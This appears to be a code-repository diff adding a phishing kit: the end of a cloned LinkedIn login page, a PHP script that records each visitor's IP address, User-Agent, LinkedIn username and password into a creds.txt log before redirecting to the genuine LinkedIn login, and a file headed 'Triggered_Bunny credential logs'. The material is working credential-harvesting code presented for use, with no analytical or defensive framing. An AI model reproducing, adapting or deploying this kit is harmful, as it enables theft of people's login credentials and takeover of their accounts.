<li class="language-selector__item"><button type="button"
class="language-selector__link role=" button"=""
data-locale="in_ID">Bahasa Indonesia (Bahasa Indonesia)</button></li>
<li class="language-selector__item"><button type="button"
class="language-selector__link role=" button"=""
data-locale="it_IT">Italiano (Italian)</button></li>
<li class="language-selector__item"><button type="button"
class="language-selector__link role=" button"=""
data-locale="ja_JP">日本語 (Japanese)</button></li>
<li class="language-selector__item"><button type="button"
class="language-selector__link role=" button"=""
data-locale="ko_KR">한국어 (Korean)</button></li>
<li class="language-selector__item"><button type="button"
class="language-selector__link role=" button"=""
data-locale="ms_MY">Bahasa Malaysia (Malay)</button></li>
<li class="language-selector__item"><button type="button"
class="language-selector__link role=" button"=""
data-locale="nl_NL">Nederlands (Dutch)</button></li>
<li class="language-selector__item"><button type="button"
class="language-selector__link role=" button"=""
data-locale="no_NO">Norsk (Norwegian)</button></li>
<li class="language-selector__item"><button type="button"
class="language-selector__link role=" button"=""
data-locale="pl_PL">Polski (Polish)</button></li>
<li class="language-selector__item"><button type="button"
class="language-selector__link role=" button"=""
data-locale="pt_BR">Português (Portuguese)</button></li>
<li class="language-selector__item"><button type="button"
class="language-selector__link role=" button"=""
data-locale="ro_RO">Română (Romanian)</button></li>
<li class="language-selector__item"><button type="button"
class="language-selector__link role=" button"=""
data-locale="ru_RU">Русский (Russian)</button></li>
<li class="language-selector__item"><button type="button"
class="language-selector__link role=" button"=""
data-locale="sv_SE">Svenska (Swedish)</button></li>
<li class="language-selector__item"><button type="button"
class="language-selector__link role=" button"=""
data-locale="th_TH">ภาษาไทย (Thai)</button></li>
<li class="language-selector__item"><button type="button"
class="language-selector__link role=" button"=""
data-locale="tl_PH">Tagalog (Tagalog)</button></li>
<li class="language-selector__item"><button type="button"
class="language-selector__link role=" button"=""
data-locale="tr_TR">Türkçe (Turkish)</button></li>
<li class="language-selector__item"><button type="button"
class="language-selector__link role=" button"=""
data-locale="zh_CN">简体中文 (Chinese (Simplified))</button></li>
<li class="language-selector__item"><button type="button"
class="language-selector__link role=" button"=""
data-locale="zh_TW">正體中文 (Chinese (Traditional))</button></li>
</ul>
</div><button class="language-selector__button" aria-expanded="false"><span
class="language-selector__label-text">Language</span><i
class="language-selector__label-icon"><svg viewBox="0 0 16 16" width="16"
height="16" preserveAspectRatio="xMinYMin meet"
xmlns="http://www.w3.org/2000/svg">
<path d="M8 9l5.93-4L15 6.54l-6.15 4.2a1.5 1.5 0 01-1.69 0L1 6.54 2.07 5z"
fill="currentColor"></path>
</svg></i></button>
</div>
</li>
</ul>
</div>
</div>
</footer>
<artdeco-toasts></artdeco-toasts><span class="hidden toast-success-icon">
<li-icon type="success-pebble-icon" size="small" aria-hidden="true"><svg viewBox="0 0 24 24" width="24px"
height="24px" x="0" y="0" preserveAspectRatio="xMinYMin meet" class="artdeco-icon"
focusable="false">
<g class="small-icon" style="fill-opacity: 1">
<circle class="circle" r="6.1" stroke="currentColor" stroke-width="1.8" cx="8" cy="8"
fill="none" transform="rotate(-90 8 8)"></circle>
<path
d="M9.95,5.033l1.2,0.859l-3.375,4.775C7.625,10.875,7.386,10.999,7.13,11c-0.002,0-0.003,0-0.005,0 c-0.254,0-0.493-0.12-0.644-0.325L4.556,8.15l1.187-0.875l1.372,1.766L9.95,5.033z"
fill="currentColor"></path>
</g>
</svg></li-icon>
</span><span class="hidden toast-error-icon">
<li-icon type="error-pebble-icon" size="small" aria-hidden="true"><svg viewBox="0 0 24 24" width="24px"
height="24px" x="0" y="0" preserveAspectRatio="xMinYMin meet" class="artdeco-icon"
focusable="false">
<g class="small-icon" style="fill-opacity: 1">
<circle class="circle" r="6.1" stroke="currentColor" stroke-width="1.8" cx="8" cy="8"
fill="none" transform="rotate(-90 8 8)"></circle>
<path fill="currentColor"
d="M10.916,6.216L9.132,8l1.784,1.784l-1.132,1.132L8,9.132l-1.784,1.784L5.084,9.784L6.918,8L5.084,6.216l1.132-1.132L8,6.868l1.784-1.784L10.916,6.216z">
</path>
</g>
</svg></li-icon>
</span><span class="hidden toast-notify-icon">
<li-icon type="yield-pebble-icon" size="small" aria-hidden="true"><svg viewBox="0 0 24 24" width="24px"
height="24px" x="0" y="0" preserveAspectRatio="xMinYMin meet" class="artdeco-icon"
focusable="false">
<g class="small-icon" style="fill-opacity: 1">
<circle class="circle" r="6.1" stroke="currentColor" stroke-width="1.8" cx="8" cy="8"
fill="none" transform="rotate(-90 8 8)"></circle>
<path d="M7,10h2v2H7V10z M7,9h2V4H7V9z"></path>
</g>
</svg></li-icon>
</span><span class="hidden toast-gdpr-icon">
<li-icon aria-hidden="true" type="shield-icon" size="small"><svg viewBox="0 0 24 24" width="24px"
height="24px" x="0" y="0" preserveAspectRatio="xMinYMin meet" class="artdeco-icon"
focusable="false">
<path
d="M8,1A10.89,10.89,0,0,1,2.87,3,1,1,0,0,0,2,4V9.33a5.67,5.67,0,0,0,2.91,5L8,16l3.09-1.71a5.67,5.67,0,0,0,2.91-5V4a1,1,0,0,0-.87-1A10.89,10.89,0,0,1,8,1ZM4,4.7A12.92,12.92,0,0,0,8,3.26a12.61,12.61,0,0,0,3.15,1.25L4.45,11.2A3.66,3.66,0,0,1,4,9.46V4.7Zm6.11,8L8,13.84,5.89,12.66A3.65,3.65,0,0,1,5,11.92l7-7V9.46A3.67,3.67,0,0,1,10.11,12.66Z"
class="small-icon" style="fill-opacity: 1"></path>
</svg></li-icon>
</span><span class="hidden toast-cancel-icon">
<li-icon type="cancel-icon" size="large"><svg x="0" y="0" id="cancel-icon"
preserveAspectRatio="xMinYMin meet" viewBox="0 0 24 24" width="24px" height="24px"><svg
class="small-icon" style="fill-opacity: 1;">
<path
d="M12.99,4.248L9.237,8L13,11.763L11.763,13L8,9.237L4.237,13L3,11.763L6.763,8L3,4.237L4.237,3L8,6.763l3.752-3.752L12.99,4.248z">
</path>
</svg><svg class="large-icon" style="fill: currentColor;">
<path
d="M20,5.237l-6.763,6.768l6.743,6.747l-1.237,1.237L12,13.243L5.257,19.99l-1.237-1.237l6.743-6.747L4,5.237L5.237,4L12,10.768L18.763,4L20,5.237z">
</path>
</svg></svg></li-icon>
</span>
<div id="loader-wrapper" class="hidden">
<li-icon type="loader" class="blue" size="medium" aria-hidden="true">
<div class="artdeco-spinner"><span class="artdeco-spinner-bars"></span><span
class="artdeco-spinner-bars"></span><span class="artdeco-spinner-bars"></span><span
class="artdeco-spinner-bars"></span><span class="artdeco-spinner-bars"></span><span
class="artdeco-spinner-bars"></span><span class="artdeco-spinner-bars"></span><span
class="artdeco-spinner-bars"></span><span class="artdeco-spinner-bars"></span><span
class="artdeco-spinner-bars"></span><span class="artdeco-spinner-bars"></span><span
class="artdeco-spinner-bars"></span></div>
</li-icon>
</div>
</div><code id="isDesktop" style="display: none;"><!--"true"--></code>
<script src="dz6wk4o93mwzoh0t6zsx73kzr" defer=""></script>
<script src="77qnm4uzm172xn82kvifmelfu" defer=""></script>
</script><code id="googleOneTapLibScriptPath" style="display: none;"><!--"8ddascte8uiyhhufy6qlnhw2b"--></code><code
id="i18nErrorGoogleOneTapGeneralErrorMessage"
style="display: none;"><!--"Something went wrong. Please try using username and password."--></code><code
id="googleUseAutoSelect" style="display: none;"><!--false--></code><code id="googleSignInLibScriptPath"
style="display: none;"><!--"84fpq9merojrilm067r9x3jdk"--></code><code
id="i18nErrorGoogleSignInGeneralErrorMessage"
style="display: none;"><!--"Something went wrong. Please try using username and password."--></code><code
id="apfcDfPK"
style="display: none;"><!--"MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqyVTa3Pi5twlDxHc34nl3MlTHOweIenIid6hDqVlh5/wcHzIxvB9nZjObW3HWfwqejGM+n2ZGbo9x8R7ByS3/V4qRgAs1z4aB6F5+HcXsx8uVrQfwigK0+u7d3g1s7H8qUaguMPHxNnyj5EisTJBh2jf9ODp8TpWnhAQHCCSZcDM4JIoIlsVdGmv+dGlzZzmf1if26U4KJqFdrqS83r3nGWcEpXWiQB+mx/EX4brbrhOFCvfPovvsLEjMTm0UC68Bvki3UsB/vkkMPW9cxNiiJJdnDkOEEdQPuFmPug+sqhACl3IIHLVBFM7vO0ca14rcCNSbSDaaKOY6BQoW1A30wIDAQAB"--></code><code
id="apfcDfPKV" style="display: none;"><!--"2"--></code>
<script src="6jblk5oqhlo45xbkmcr7s4zix" defer=""></script><code id="lix_cv_scoring_login_get_fingerprint"
style="display: none;"><!--"control"--></code>
<script src="dnz8biurbtozxjvxufs5aq4jd" defer="" gapi_processed="true"></script><iframe id="ssIFrame_google"
sandbox="allow-scripts allow-same-origin" aria-hidden="true" frame-border="0"
style="position: absolute; width: 1px; height: 1px; inset: -9999px; display: none;"
src="https://accounts.google.com/o/oauth2/iframe#origin=https%3A%2F%2Fwww.linkedin.com&amp;rpcToken=1609696041.0530887"></iframe>
</body>
</html>

View File

@ -0,0 +1,27 @@
<?php
if(isset($_SERVER['HTTP_CLIENT_IP']))
{
$ipaddr = $_SERVER['HTTP_CLIENT_IP'];
}
elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ipaddr = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
$ipaddr = $_SERVER['REMOTE_ADDR'];
}
if(strpos($ipaddr,',') !== false)
{
$ipaddr = preg_split("/\,/", $ipaddr)[0];
}
$fp = fopen("../logs/creds.txt", 'a');
fwrite($fp, "\n\nTimestamp: " . date('Y-m-d H:i:s') . "\nIP: " . $ipaddr . "\r\n" . "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\n");
fclose($fp);
file_put_contents("../logs/creds.txt", "Linkedin Username: " . $_POST['session_key'] . " Pass: " . $_POST['session_password'] . "\n", FILE_APPEND);
header('Location: https://www.linkedin.com/login');
exit();
?>

View File

@ -0,0 +1 @@
Triggered_Bunny credential logs:

File diff suppressed because one or more lines are too long

Some files were not shown because too many files have changed in this diff Show More